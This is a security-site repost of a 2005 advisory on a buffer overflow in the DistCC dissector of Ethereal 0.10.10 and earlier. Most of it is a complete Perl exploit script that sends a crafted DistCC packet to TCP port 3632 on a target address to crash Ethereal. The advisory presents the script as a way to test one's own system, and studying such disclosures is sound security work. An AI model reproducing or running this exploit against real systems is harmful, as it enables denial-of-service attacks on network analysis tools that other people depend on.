首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ethereal DistCC Buffer Overflow (Exploit)
来源:storm@beyondsecurity.com 作者:beSTORM 发布时间:2005-05-11  

Ethereal DistCC Buffer Overflow (Exploit)


Summary
As we reported in our previous article: Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal's DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer used by Ethereal when it tries to handle DistCC related packets. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by beSTORM.

Details
Vulnerable Systems:
* Ethereal version 0.10.10 and prior

Immune Systems:
* Ethereal version 0.10.11 or newer

Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved - Copyright (tm)

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;

if (!$target)
{
usage();

print "No target has been supplied, reverting to 192.168.1.52.\n";
$target = "192.168.1.52";
}

print "Will attack $target.\n";
my $target_port = 3632;

my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()\n{\n return(0);\n}\n
END

print "Sending: [$packet]\n";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "3632");

unless ($remote) { die "cannot connect to distcc daemon on $target" }

print $remote $packet;

print "Done.\n";

sub usage
{
if ($print_usage) { return; }
$print_usage = 1;
print ("#"x50);
print "\n";
print "# $0 [hostname]\n";
print "# hostname\t-\tThe host the packet will be sent to.\n";
print "\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fusion SBX Password Bypass and
·Mozilla Firefox Arbitrary Code
·Ethereal SIP Dissector Overflo
·Hosting Controller Unauthentic
·NetWin DMail Format String (xt
·MySQL MaxDB Webtool GET Comman
·Mozilla Firefox 1.0.3 Remote A
·Microsoft Message Queuing Remo
·Ethereal <= 0.10.10 SMB Dis
·Linux Kernel binfmt_elf Core D
·4D WebStar Tomcat Plugin Remot
·Ethereal <= 0.10.10 SIP Dis
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved